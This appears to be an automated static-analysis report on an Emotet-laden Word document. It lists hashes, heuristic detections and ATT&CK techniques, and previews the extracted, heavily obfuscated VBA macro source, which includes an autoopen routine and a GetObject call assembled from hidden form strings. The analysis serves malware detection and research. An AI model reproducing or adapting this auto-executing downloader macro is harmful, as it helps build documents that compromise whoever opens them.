Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 52ee982eebb1f7ff…

MALICIOUS

Office (OLE)

Size: 169.1 KB
Created: 2019-03-28 06:21:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 5953af7560ab059adf410d1c82f6849d
SHA-1: 757f372575ece3165db92c7f065b002f2d71f812
SHA-256: 52ee982eebb1f7ff4e197bcca2d007e233bd67817df16344cf700e8fc9d87631
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The presence of critical ClamAV detection for 'Doc.Downloader.Emotet-6915304-0' strongly indicates Emotet. High-severity heuristics for VBA macros, specifically the AutoOpen macro and GetObject calls, confirm the malicious intent. The VBA script itself, though heavily obfuscated, is designed to execute code, likely downloading a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6915304-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6915304-0
  • VBA macros detected [medium, OLE_VBA_MACROS; 3 related findings]
    Document contains VBA macro code
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • GetObject call [high, OLE_VBA_GETOBJ]
    GetObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26815 bytes
SHA-256: b3b76a38fd42a3c8d14464668e75ca94b2bcfb80e3e3d930ae0cd49462646cf9

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "uAA_BwUw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JkAAAU"
Attribute VB_Base = "0{52DC096B-751C-490D-9C1A-78F51476E10E}{2E2BCE39-5C4C-4F45-B514-166935CD0570}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UDAU4_A"
Attribute VB_Base = "0{DD517C70-0D77-4583-B0D8-AAF8343168E4}{A96A2C5C-DB79-4BD9-AB54-6E853EE4CD67}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "qQDCcZ"
Function f_4xUA()
   If SDBGAA = S1BAwQD Then
         Cw1QD1B = (67233139 - lBD_cUA * q_AD1AX * CDate(460536452))
         VAD4AAGA = o14XAB4A / Oct(CABG1oxB) - IBQAwc * CDbl(630054528) / BACAcA * Fix(531535278 * Log(j_ACAAAA)) / RAAAQ_B * Chr(941501060) * 522680727 * Sgn(mwUcQBDB / Log(609474635))
End If
   If iAB_DA = cBZxDX Then
         ZDUAACAx = (6437404 - QDAA14QG * zAAAGAZ * CDate(498833930))
         WABwD_A = kQA_UwxA / Oct(VBZAXQ) - lDxQQkU * CDbl(501435334) / WABAUC * Fix(74420857 * Log(i_XAxA1)) / vBAGACA1 * Chr(705875475) * 162258319 * Sgn(CXAQ_G / Log(366675646))
End If
   If Q1AAD_ = wB1UDoC Then
         zAQC1AU = (307129179 - oAQxBZ * wDDDwC * CDate(401025812))
         MwBACA = VG1AxUC / Oct(DkAAAA) - wUA4DAQ * CDbl(619277582) / DBAAZAA * Fix(429371760 * Log(NCAUADAA)) / pAZBcw * Chr(793992921) * 785684208 * Sgn(mAAAooxw / Log(615865300))
End If
   If QDAAk4Z = MXCw4CAo Then
         SBkcxAc = (509808275 - qUXAAAAA * RUxZAA * CDate(332931167))
         R_GAXDBX = EkDcAB / Oct(Qc1ABxDA) - jXUZAAX_ * CDbl(120054638) / dGkA_A * Fix(27879187 * Log(zACAxABX)) / OkAABXC4 * Chr(856534805) * 435271648 * Sgn(mDcAAAA / Log(388011923))
End If
   If vkAZDUAU = CQXB1C Then
         zcBUBx = (722373790 - XCAAUDxA * s4G1XXA * CDate(935188457))
         NAAUA_ = LAUQBC / Oct(CGAAXZA) - lAUDZQ * CDbl(73317707) / aGwAwAZQ * Fix(121284590 * Log(DAUUAAG1)) / nAXZUA * Chr(156503795) * 852814676 * Sgn(Rxc_wwk_ / Log(731766567))
End If
   If zAAAXAA = hwBcDAU Then
         JZUDAkAQ = (543694291 - QABB1A * PBwUkcAA * CDate(163874068))
         DAAXAAQ = pxAQGAAU / Oct(jAUGQX) - iDZQAAXU * CDbl(493859892) / oxQQAC * Fix(295722000 * Log(B1CoGAB)) / IoxBxAQA * Chr(12592245) * 106550423 * Sgn(PADAocA / Log(371327178))
End If
   If zZDDkX = iACZB4xc Then
         FB_X44w = (560486909 - qCDZA1BD * DAwGXkA * CDate(120363099))
         T4A_oA = uZAQBkBA / Oct(kAxG_A1) - oxZADA4 * CDbl(610300145) / u4_QA_x_ * Fix(520962759 * Log(qQoBUA)) / H4XUUQAU * Chr(226037469) * 43318243 * Sgn(aGCDowZX / Log(176466882))
End If
End Function
Sub autoopen()
On Error Resume Next
   If OGGA1BDA = iDAD1Q Then
         HkxBoCA = (21443318 - pX4__A * jABAUB * CDate(761750024))
         YAwCAA = BQAAUA1 / Oct(bUAXA1wX) - uDU_DAA * CDbl(664833741) / RDxAxABU * Fix(301960582 * Log(PZCxDQ)) / ocQBQAU4 * Chr(302494254) * 370833630 * Sgn(MAQAAUDX / Log(204385647))
End If
   If CA4cBUQX = ADBAQAAD Then
         JQxDoBU = (562639347 - WAAQZG * KBXAcoo * CDate(351445518))
         MZUcXkAZ = Fc1c_DA / Oct(QABQAo) - BBAwQU * CDbl(702444548) / zABUUx * Fix(424656330 * Log(KAXU4A)) / rAUCAD * Chr(705662023) * 896524291 * Sgn(F1B14GwA / Log(981769319))
End If
   If fBC4QAA = PGkAcAGU Then
         oBBAAZ = (26999746 - M_1CAQ * Kwo_1wAG * CDate(195854571))
         dQUXZUD = GADAUUCD / Oct(QQAB__AQ) - bAA1A1A * CDbl(531575438) / MUc_BoAA * Fix(80612555 * Log(zG_ADA)) / lUC4AA * Chr(87562782) * 878043131 * Sgn(EAUDXZ / Log(605341966))
End If
Set CAXwcUo_ = GetObject(JkAAAU.iQDc4A.Text + UDAU4_A.qAAAXUAo + JkAAAU.iQDc4A)
   If iAkAAAB_ = M4cABcAk Then
... (truncated)